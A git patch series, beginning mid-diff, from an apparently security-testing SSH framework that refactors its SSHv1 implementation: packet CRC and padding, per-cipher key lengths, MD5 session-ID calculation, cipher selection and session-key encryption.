CRC(); - /* byte[] value = - ArrayConverter.concatenate( - binaryPacket.getPadding().getValue(), - binaryPacket.getCompressedPayload().getValue());*/ - byte[] value = binaryPacket.getCompressedPayload().getValue(); - LOGGER.debug("Calculating Checksum over {}", value); byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(value), 4); binaryPacket.setCrcChecksum(checksum); - LOGGER.debug( - "CRC: " - + ArrayConverter.bytesToRawHexString( - binaryPacket.getCrcChecksum().getValue())); } @Override @@ -86,7 +76,7 @@ public void encrypt(BinaryPacketSSHv1 packet) { packet.setLength( packet.getCompressedPayload().getValue().length + 4); // +4 for CRC-Checksum - packet.setPaddingLength(calculatePaddingLengthSSHv1(packet)); + packet.setPaddingLength(calculatePaddingLength(packet)); packet.setPadding(calculatePadding(packet.getPaddingLength().getValue())); packet.setCompressedPayload( @@ -225,59 +215,15 @@ public void decrypt(BinaryPacketSSHv1 packet) throws CryptoException { DecryptionParser parser = new DecryptionParser(packet.getPayload().getValue()); - packet.setPaddingLength(8 - packet.getLength().getValue() % 8); - packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); - - byte[] newPayload = parser.parseByteArrayField(packet.getLength().getValue() - 4); - - packet.setCrcChecksum(parser.parseByteArrayField(4)); - - LOGGER.debug("DEBUGGER"); - LOGGER.debug( - "Padding: {}", ArrayConverter.bytesToHexString(packet.getPadding().getValue())); - LOGGER.debug("Payload: {}", ArrayConverter.bytesToHexString(newPayload)); - LOGGER.debug( - "CRC_Checksum: {}", - ArrayConverter.bytesToHexString(packet.getCrcChecksum().getValue())); - - // ** DEBUG**// - - cipher = - CipherFactory.getCipher( - EncryptionAlgorithm.TRIPLE_DES_CBC, - keySet == null - ? null - : mode == CipherMode.ENCRYPT - ? keySet.getWriteEncryptionKey(getLocalConnectionEndType()) - : keySet.getReadEncryptionKey(getLocalConnectionEndType())); - - nextIv = - mode == CipherMode.ENCRYPT - ? keySet.getWriteIv(getLocalConnectionEndType()) - : keySet.getReadIv(getLocalConnectionEndType()); - - decryptInner(packet); - - parser = new DecryptionParser(packet.getPayload().getValue()); - - packet.setPaddingLength(8 - packet.getLength().getValue() % 8); + packet.setPaddingLength(calculatePaddingLength(packet)); packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); - newPayload = parser.parseByteArrayField(packet.getLength().getValue() - 4); - - packet.setCrcChecksum(parser.parseByteArrayField(4)); - - LOGGER.debug("DEBUGGER"); - LOGGER.debug( - "Padding: {}", ArrayConverter.bytesToHexString(packet.getPadding().getValue())); - LOGGER.debug("Payload: {}", ArrayConverter.bytesToHexString(newPayload)); - LOGGER.debug( - "CRC_Checksum: {}", - ArrayConverter.bytesToHexString(packet.getCrcChecksum().getValue())); - - // **END**// + byte[] compressedPayload = + parser.parseByteArrayField(packet.getLength().getValue() - 4); // 4 for CRC - packet.setCompressedPayload(newPayload); + packet.setCrcChecksum( + parser.parseByteArrayField(BinaryPacketConstants.CRC_FIELD_LENGHT)); // parse last 4 + packet.setCompressedPayload(compressedPayload); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java index 41439c2e3..2bf3babf0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java @@ -12,6 +12,7 @@ import de.rub.nds.sshattacker.core.constants.KeyDerivationLabels; import de.rub.nds.sshattacker.core.crypto.KeyDerivation; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.constant.LayerType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; @@ -27,11 +28,10 @@ private KeySetGenerator() {} public static AbstractKeySet generateKeySet(SshContext context) { AbstractKeySet keySet; - if (context.getContext() - .getLayerStack() - .getHighestLayer() - .getLayerType() - .equals(ImplementedLayers.SSHV2)) { + + LayerType highestLayer = + context.getContext().getLayerStack().getHighestLayer().getLayerType(); + if (highestLayer.equals(ImplementedLayers.SSHV2)) { keySet = new SSHv2KeySet(); Chooser chooser = context.getChooser(); String hashAlgorithm = chooser.getKeyExchangeAlgorithm().getDigest(); @@ -91,16 +91,13 @@ public static AbstractKeySet generateKeySet(SshContext context) { hashAlgorithm)); LOGGER.info(keySet); - } else if (context.getContext() - .getLayerStack() - .getHighestLayer() - .getLayerType() - .equals(ImplementedLayers.SSHV1)) { + } else if (highestLayer.equals(ImplementedLayers.SSHV1)) { keySet = new SSHv1KeySet(); byte[] sharedSecret = context.getSharedSecret().orElse(new byte[] {0}); if (context.getEncryptionAlgorithmClientToServer().isPresent() && context.getEncryptionAlgorithmServerToClient().isPresent()) { + EncryptionAlgorithm c2s, s2c; c2s = context.getEncryptionAlgorithmClientToServer().get(); @@ -109,6 +106,9 @@ public static AbstractKeySet generateKeySet(SshContext context) { byte[] server_key; byte[] client_key; + // Only DES, RC4, Blowfish and Triple DES are implemented now; Setting Key-Lenghtes + // accordingly + // Missing TSS and IDEA (CFB) if (c2s == EncryptionAlgorithm.TRIPLE_DES_CBC && s2c == EncryptionAlgorithm.TRIPLE_DES_CBC) { server_key = Arrays.copyOfRange(sharedSecret, 0, 24); @@ -117,6 +117,34 @@ public static AbstractKeySet generateKeySet(SshContext context) { LOGGER.debug( "SHARED SECRET is {}", ArrayConverter.bytesToHexString(server_key)); + } else if (c2s == EncryptionAlgorithm.DES_CBC + && s2c == EncryptionAlgorithm.DES_CBC) { + server_key = Arrays.copyOfRange(sharedSecret, 0, 8); + client_key = Arrays.copyOfRange(sharedSecret, 0, 8); + + LOGGER.debug( + "SHARED SECRET is {}", ArrayConverter.bytesToHexString(server_key)); + + } else if (c2s == EncryptionAlgorithm.BLOWFISH_CBC + && s2c == EncryptionAlgorithm.BLOWFISH_CBC) { + server_key = Arrays.copyOfRange(sharedSecret, 0, 32); + client_key = Arrays.copyOfRange(sharedSecret, 0, 32); + + LOGGER.debug( + "SHARED SECRET is {}", ArrayConverter.bytesToHexString(server_key)); + + } else if (c2s == EncryptionAlgorithm.ARCFOUR128 + && s2c == EncryptionAlgorithm.ARCFOUR128) { + server_key = Arrays.copyOfRange(sharedSecret, 0, 16); + client_key = Arrays.copyOfRange(sharedSecret, 16, 32); + + LOGGER.debug( + "Key Server 2 Client is {}", + ArrayConverter.bytesToHexString(server_key)); + LOGGER.debug( + "Key Client 2 Server is {}", + ArrayConverter.bytesToHexString(client_key)); + } else { server_key = sharedSecret; client_key = sharedSecret; @@ -127,6 +155,12 @@ public static AbstractKeySet generateKeySet(SshContext context) { keySet.setClientWriteInitialIv(new byte[c2s.getIVSize()]); keySet.setServerWriteInitialIv(new byte[s2c.getIVSize()]); LOGGER.debug("Generated SSHv1 Keyset sucessfully"); + } else { + LOGGER.warn( + "Missing EncryptionAlgorithm for {}", + context.getEncryptionAlgorithmClientToServer().isPresent() + ? "Server!" + : "Client!"); } } else { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java index 609646632..f5bdf4ddf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -7,12 +7,20 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.handler; +import com.google.common.primitives.Bytes; +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; +import de.rub.nds.sshattacker.core.constants.CipherMethod; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import java.nio.charset.StandardCharsets; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -32,36 +40,16 @@ public ServerPublicKeyMessageHandler(SshContext context) { @Override public void adjustContext(ServerPublicKeyMessage message) { - String serverKeyModulus = - new String( - message.getServerKey().getPublicKey().getModulus().toByteArray(), - StandardCharsets.UTF_8); - String hostKeyModulus = - new String( - message.getHostKey().getPublicKey().getModulus().toByteArray(), - StandardCharsets.UTF_8); - String cookie = - new String(message.getAntiSpoofingCookie().getValue(), StandardCharsets.UTF_8); - - String concatenated = serverKeyModulus + hostKeyModulus + cookie; - try { - MessageDigest md = MessageDigest.getInstance("MD5"); - md.update(concatenated.getBytes(StandardCharsets.UTF_8)); - byte[] digest = md.digest(); - sshContext.setSshv1SessionID(digest); - } catch (NoSuchAlgorithmException e) { - throw new RuntimeException(e); - } - sshContext.setServerKey(message.getServerKey()); sshContext.setHostKey(message.getHostKey()); sshContext.setAntiSpoofingCookie(message.getAntiSpoofingCookie().getValue()); sshContext.setSupportedCipherMethods(message.getSupportedCipherMethods()); sshContext.setSupportedAuthenticationMethods(message.getSupportedAuthenticationMethods()); sshContext.setChosenProtocolFlags(message.getChosenProtocolFlags()); - // TODO: Choose correct CipherMethod - // TODO: Choose correct AuthenticationMethod + caluculateSessionId(message); + setCipherMethod(message); + setAuthenticationMethod(message); // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); // setRemoteValues(message); @@ -79,78 +67,77 @@ public void adjustContext(ServerPublicKeyMessage message) { KeyExchangeUtil.generateKeySet(sshContext);*/ } - /*private void setRemoteValues(ServerPublicKeyMessage message) { - sshContext - .getChooser() - .getHybridKeyExchange() - .getKeyAgreement() - .setRemotePublicKey(message.getPublicKey().getValue()); - LOGGER.info( - "RemoteKey Agreement = " - + ArrayConverter.bytesToRawHexString(message.getPublicKey().getValue())); - sshContext - .getChooser() - .getHybridKeyExchange() - .getKeyEncapsulation() - .setEncryptedSharedSecret(message.getCombinedKeyShare().getValue()); - LOGGER.info( - "Ciphertext Encapsulation = " - + ArrayConverter.bytesToRawHexString( - message.getCombinedKeyShare().getValue())); - byte[] combined; - switch (sshContext.getChooser().getHybridKeyExchange().getCombiner()) { - case CLASSICAL_CONCATENATE_POSTQUANTUM: - combined = - KeyExchangeUtil.concatenateHybridKeys( - message.getPublicKey().getValue(), - message.getCombinedKeyShare().getValue()); - sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); - break; - case POSTQUANTUM_CONCATENATE_CLASSICAL: - combined = - KeyExchangeUtil.concatenateHybridKeys( - message.getCombinedKeyShare().getValue(), - message.getPublicKey().getValue()); - sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); - break; - default: - LOGGER.warn( - "Combiner" - + sshContext.getChooser().getHybridKeyExchange().getCombiner() - + " is not supported."); - break; - } - }*/ + private void setCipherMethod(ServerPublicKeyMessage message) { - /*@Override - public SshMessageParser getParser(byte[] array) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessageParser( - array, kex.getCombiner(), kex.getPkAgreementLength(), kex.getCiphertextLength()); - } + Collections.reverse(message.getSupportedCipherMethods()); - @Override - public SshMessageParser getParser( - byte[] array, int startPosition) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessageParser( - array, - startPosition, - kex.getCombiner(), - kex.getPkAgreementLength(), - kex.getCiphertextLength()); + List supportedCipherMethods = message.getSupportedCipherMethods(); + + // As the RFC States: prefer 3DES, then Blowfish, and then the rest. + if (supportedCipherMethods.contains(CipherMethod.SSH_CIPHER_3DES)) { + sshContext.setChosenCipherMethod(CipherMethod.SSH_CIPHER_3DES); + } else if (supportedCipherMethods.contains(CipherMethod.SSH_CIPHER_BLOWFISH)) { + sshContext.setChosenCipherMethod(CipherMethod.SSH_CIPHER_BLOWFISH); + } else { + CipherMethod chosenCipherMethod = supportedCipherMethods.get(0); + sshContext.setChosenCipherMethod(chosenCipherMethod); + } } - @Override - public SshMessagePreparator getPreparator() { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessagePreparator( - context.getChooser(), message, kex.getCombiner()); + private void setAuthenticationMethod(ServerPublicKeyMessage message) { + + Collections.reverse(message.getSupportedAuthenticationMethods()); + List supportedAuthenticationMethods = + message.getSupportedAuthenticationMethods(); + sshContext.setChosenAuthenticationMethod(supportedAuthenticationMethods.get(0)); } - @Override - public SshMessageSerializer getSerializer() { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessageSerializer(message, kex.getCombiner()); - }*/ + private void caluculateSessionId(ServerPublicKeyMessage message) { + + byte[] serverModulus; + byte[] hostModulus; + byte[] cookie; + SshPublicKey serverkey = message.getServerKey(); + + if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { + CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); + serverModulus = rsaPublicKey.getModulus().toByteArray(); + } else { + throw new RuntimeException(); + } + + SshPublicKey hostKey = message.getHostKey(); + if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { + CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); + hostModulus = rsaPublicKey.getModulus().toByteArray(); + } else { + throw new RuntimeException(); + } + + // Remove sign-byte if present + if (hostModulus[0] == 0) { + hostModulus = Arrays.copyOfRange(hostModulus, 1, hostModulus.length); + } + if (serverModulus[0] == 0) { + serverModulus = Arrays.copyOfRange(serverModulus, 1, serverModulus.length); + } + + cookie = message.getAntiSpoofingCookie().getValue(); + + LOGGER.debug("Servermodulus for SessionID: {}", serverModulus); + LOGGER.debug("Hostmodulus for SessionID: {}", hostModulus); + LOGGER.debug("Cookie for SessionID: {}", cookie); + + MessageDigest md; + try { + md = MessageDigest.getInstance("MD5"); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } + md.update(Bytes.concat(hostModulus, serverModulus, cookie)); + byte[] sessionID = md.digest(); + LOGGER.debug("Session-ID {}", ArrayConverter.bytesToHexString(sessionID)); + sshContext.setSessionID(sessionID); + sshContext.setSshv1SessionID(sessionID); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 15bbae7b5..2852ad0d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; -import com.google.common.primitives.Bytes; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; @@ -18,9 +17,6 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import java.security.MessageDigest; -import java.security.NoSuchAlgorithmException; -import java.util.Arrays; import java.util.List; import java.util.Random; import org.apache.logging.log4j.LogManager; @@ -42,58 +38,7 @@ private void prepareAntiSpoofingCookie() { } private void prepareSessionID() { - byte[] serverModulus; - byte[] hostModulus; - byte[] cookie; - SshPublicKey serverkey = chooser.getContext().getSshContext().getServerKey(); - - if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { - CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); - serverModulus = rsaPublicKey.getModulus().toByteArray(); - } else { - throw new RuntimeException(); - } - - SshPublicKey hostKey = - chooser.getContext().getSshContext().getHostKey().orElseThrow(); - if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { - CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); - hostModulus = rsaPublicKey.getModulus().toByteArray(); - } else { - throw new RuntimeException(); - } - - // DEBUG CODE - if (hostModulus[0] == 0) { - hostModulus = Arrays.copyOfRange(hostModulus, 1, hostModulus.length); - } - // DEBUG CODE - - // DEBUG CODE - if (serverModulus[0] == 0) { - serverModulus = Arrays.copyOfRange(serverModulus, 1, serverModulus.length); - } - // DEBUG CODE - - cookie = chooser.getContext().getSshContext().getAntiSpoofingCookie(); - - LOGGER.debug("Servermodulus for SessionID: {}", serverModulus); - LOGGER.debug("Hostmodulus for SessionID: {}", hostModulus); - LOGGER.debug("Cookie for SessionID: {}", cookie); - - MessageDigest md; - try { - md = MessageDigest.getInstance("MD5"); - } catch (NoSuchAlgorithmException e) { - throw new RuntimeException(e); - } - md.update(Bytes.concat(hostModulus, serverModulus, cookie)); - // md.update(Bytes.concat(serverModulus, hostModulus, cookie)); - byte[] sessionID = md.digest(); - LOGGER.debug("Session-ID {}", ArrayConverter.bytesToHexString(sessionID)); - getObject().setSshv1SessionID(sessionID); - chooser.getContext().getSshContext().setSessionID(sessionID); - chooser.getContext().getSshContext().setSshv1SessionID(sessionID); + getObject().setAntiSpoofingCookie(chooser.getContext().getSshContext().getSshv1SessionID()); } private void prepareEncryptionAlgorithm() { @@ -102,10 +47,10 @@ private void prepareEncryptionAlgorithm() { if (!chooser.getContext().getSshContext().getSupportedCipherMethods().isEmpty()) { chosenCipherMethod = chooser.getContext().getSshContext().getSupportedCipherMethods().get(0); - if (chooser.getContext().getSshContext().getSupportedCipherMethods().size() > 1) { + /*if (chooser.getContext().getSshContext().getSupportedCipherMethods().size() > 1) { chosenCipherMethod = chooser.getContext().getSshContext().getSupportedCipherMethods().get(1); - } + }*/ chooser.getContext().getSshContext().setChosenCipherMethod(chosenCipherMethod); // Derive correct Encryption Algorithm diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index d54b0bf2f..3736259d8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -228,6 +228,12 @@ private void prepareSessionID() { } // DEBUG CODE + // DEBUG CODE + if (serverModulus[0] == 0) { + serverModulus = Arrays.copyOfRange(serverModulus, 1, serverModulus.length); + } + // DEBUG CODE + LOGGER.debug("Servermodulus for SessionID: {}", serverModulus); LOGGER.debug("Hostmodulus for SessionID: {}", hostModulus); LOGGER.debug("Cookie for SessionID: {}", cookie); From d96c20d25235af5223dd56254e95c97418221160 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 22 Sep 2023 23:03:15 +0200 Subject: [PATCH 084/176] Fixing implenetation and cleanup code --- .../ServerPublicKeyMessageHandler.java | 60 ++++++++++++------- .../ClientSessionKeyMessagePreparator.java | 60 ++++++++----------- 2 files changed, 62 insertions(+), 58 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java index f5bdf4ddf..4fa8bfde8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -11,6 +11,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; import de.rub.nds.sshattacker.core.constants.CipherMethod; +import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.layer.context.SshContext; @@ -32,11 +33,6 @@ public ServerPublicKeyMessageHandler(SshContext context) { super(context); } - /*public HybridKeyExchangeReplyMessageHandler( - SshContext context, HybridKeyExchangeReplyMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ServerPublicKeyMessage message) { @@ -50,21 +46,6 @@ public void adjustContext(ServerPublicKeyMessage message) { caluculateSessionId(message); setCipherMethod(message); setAuthenticationMethod(message); - - // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); - // setRemoteValues(message); - /* sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); - sshContext.setSharedSecret( - sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); - sshContext - .getExchangeHashInputHolder() - .setSharedSecret(sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); - KeyExchangeUtil.computeExchangeHash(sshContext); - */ - /* KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message);*/ - /* - KeyExchangeUtil.setSessionId(sshContext); - KeyExchangeUtil.generateKeySet(sshContext);*/ } private void setCipherMethod(ServerPublicKeyMessage message) { @@ -72,16 +53,51 @@ private void setCipherMethod(ServerPublicKeyMessage message) { Collections.reverse(message.getSupportedCipherMethods()); List supportedCipherMethods = message.getSupportedCipherMethods(); - + CipherMethod chosenCipherMethod; // As the RFC States: prefer 3DES, then Blowfish, and then the rest. if (supportedCipherMethods.contains(CipherMethod.SSH_CIPHER_3DES)) { sshContext.setChosenCipherMethod(CipherMethod.SSH_CIPHER_3DES); } else if (supportedCipherMethods.contains(CipherMethod.SSH_CIPHER_BLOWFISH)) { sshContext.setChosenCipherMethod(CipherMethod.SSH_CIPHER_BLOWFISH); } else { - CipherMethod chosenCipherMethod = supportedCipherMethods.get(0); + chosenCipherMethod = supportedCipherMethods.get(0); sshContext.setChosenCipherMethod(chosenCipherMethod); } + + LOGGER.debug("Set Ciphermethod {}", sshContext.getChosenCipherMethod()); + + EncryptionAlgorithm encryptionAlgorithm; + switch (sshContext.getChosenCipherMethod()) { + case SSH_CIPHER_3DES: + encryptionAlgorithm = EncryptionAlgorithm.TRIPLE_DES_CBC; + break; + case SSH_CIPHER_NONE: + encryptionAlgorithm = EncryptionAlgorithm.NONE; + break; + case SSH_CIPHER_IDEA: + encryptionAlgorithm = EncryptionAlgorithm.IDEA_CTR; // Wrong, needts to be IDEA_CFB! + break; + case SSH_CIPHER_DES: + encryptionAlgorithm = EncryptionAlgorithm.DES_CBC; + break; + case SSH_CIPHER_ARCFOUR: + encryptionAlgorithm = EncryptionAlgorithm.ARCFOUR; + break; + case SSH_CIPHER_BLOWFISH: + encryptionAlgorithm = EncryptionAlgorithm.BLOWFISH_CBC; + break; + default: + encryptionAlgorithm = EncryptionAlgorithm.NONE; + // Fallback to None if nothing applied, throw Warning. + LOGGER.warn( + "chosen unsupported Encryption-Algorithm {}, fall back to NONE", + sshContext.getChosenCipherMethod()); + } + + LOGGER.info("Successfulle applied Encryption Algorihm {}", encryptionAlgorithm); + + sshContext.setEncryptionAlgorithmClientToServer(encryptionAlgorithm); + sshContext.setEncryptionAlgorithmServerToClient(encryptionAlgorithm); } private void setAuthenticationMethod(ServerPublicKeyMessage message) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 2852ad0d0..6935a7902 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; -import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; @@ -43,14 +42,16 @@ private void prepareSessionID() { private void prepareEncryptionAlgorithm() { // Choose Encryption Type - CipherMethod chosenCipherMethod; - if (!chooser.getContext().getSshContext().getSupportedCipherMethods().isEmpty()) { + // CipherMethod chosenCipherMethod; + /*if (!chooser.getContext().getSshContext().getSupportedCipherMethods().isEmpty()) { + chosenCipherMethod = + chooser.getContext().getSshContext().getSupportedCipherMethods().get(0); + */ + /*if (chooser.getContext().getSshContext().getSupportedCipherMethods().size() > 1) { chosenCipherMethod = - chooser.getContext().getSshContext().getSupportedCipherMethods().get(0); - /*if (chooser.getContext().getSshContext().getSupportedCipherMethods().size() > 1) { - chosenCipherMethod = - chooser.getContext().getSshContext().getSupportedCipherMethods().get(1); - }*/ + chooser.getContext().getSshContext().getSupportedCipherMethods().get(1); + }*/ + /* chooser.getContext().getSshContext().setChosenCipherMethod(chosenCipherMethod); // Derive correct Encryption Algorithm @@ -93,8 +94,12 @@ private void prepareEncryptionAlgorithm() { .getSshContext() .setEncryptionAlgorithmServerToClient(encryptionAlgorithm); - getObject().setChosenCipherMethod(chosenCipherMethod); - } + getObject().setChosenCipherMethod(chooser.getContext().getSshContext().getChosenCipherMethod()); + }*/ + + getObject() + .setChosenCipherMethod( + chooser.getContext().getSshContext().getChosenCipherMethod()); LOGGER.info( "Choose Ciphermethod: {}", chooser.getContext().getSshContext().getChosenCipherMethod()); @@ -118,43 +123,31 @@ private void prepareProtoclFlags() { } private void prepareSessionKey() throws CryptoException { + CustomRsaPublicKey hostPublickey; + CustomRsaPublicKey serverPublicKey; + + SshPublicKey serverkey = chooser.getContext().getSshContext().getServerKey(); + SshPublicKey hostKey = + chooser.getContext().getSshContext().getHostKey().orElseThrow(); + Random random = new Random(); byte[] sessionKey = new byte[32]; - byte[] plainSessionKey; random.nextBytes(sessionKey); + byte[] plainSessionKey = sessionKey.clone(); - plainSessionKey = sessionKey.clone(); - - // byte[] sessionID = getObject().getSshv1SessionID().getValue(); + // Use xored sessionkey for transmission byte[] sessionID = chooser.getContext().getSshContext().getSshv1SessionID(); - LOGGER.debug("Session id = {}", ArrayConverter.bytesToHexString(sessionID)); - LOGGER.debug( - "the not XORED Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); - int i = 0; for (byte sesseionByte : sessionID) { sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); } - LOGGER.debug( - "the Plain Session_key is {}", ArrayConverter.bytesToHexString(plainSessionKey)); - - LOGGER.debug("the XORED Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); - // plainSessionKey = sessionKey; - - CustomRsaPublicKey hostPublickey; - CustomRsaPublicKey serverPublicKey; - - SshPublicKey serverkey = chooser.getContext().getSshContext().getServerKey(); - if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { serverPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); } else { throw new CryptoException("Public-Server-Key is Missing"); } - SshPublicKey hostKey = - chooser.getContext().getSshContext().getHostKey().orElseThrow(); if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { hostPublickey = (CustomRsaPublicKey) hostKey.getPublicKey(); } else { @@ -182,7 +175,6 @@ private void prepareSessionKey() throws CryptoException { sessionKey = outerEncryption.encrypt(sessionKey); - LOGGER.debug("Scucessfull Decrypted, Sanity-Check passed"); } else { LOGGER.debug( @@ -196,8 +188,6 @@ private void prepareSessionKey() throws CryptoException { outerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPublickey); sessionKey = outerEncryption.encrypt(sessionKey); - - LOGGER.debug("Scucessfull Decrypted, Sanity-Check passed"); } } catch (CryptoException e) { @@ -205,11 +195,9 @@ private void prepareSessionKey() throws CryptoException { } } - // Set Sessionkey getObject().setEncryptedSessioKey(sessionKey); chooser.getContext().getSshContext().setSessionKey(plainSessionKey); chooser.getContext().getSshContext().setSharedSecret(plainSessionKey); - // LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(plainSessionKey)); } @Override From 383ffd615ea33e94d29e40a4ea032b98b163ad58 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 23 Sep 2023 01:20:13 +0200 Subject: [PATCH 085/176] Code Cleanups --- .../nds/sshattacker/core/config/Config.java | 50 ++++++++++++++ .../core/layer/context/SshContext.java | 4 +- .../ClientSessionKeyMessagePreparator.java | 60 +--------------- .../ServerPublicKeyMessagePreparator.java | 68 +++++-------------- .../core/workflow/chooser/Chooser.java | 2 + .../core/workflow/chooser/DefaultChooser.java | 14 ++++ 6 files changed, 85 insertions(+), 113 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 689835037..b70d6b20c 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ 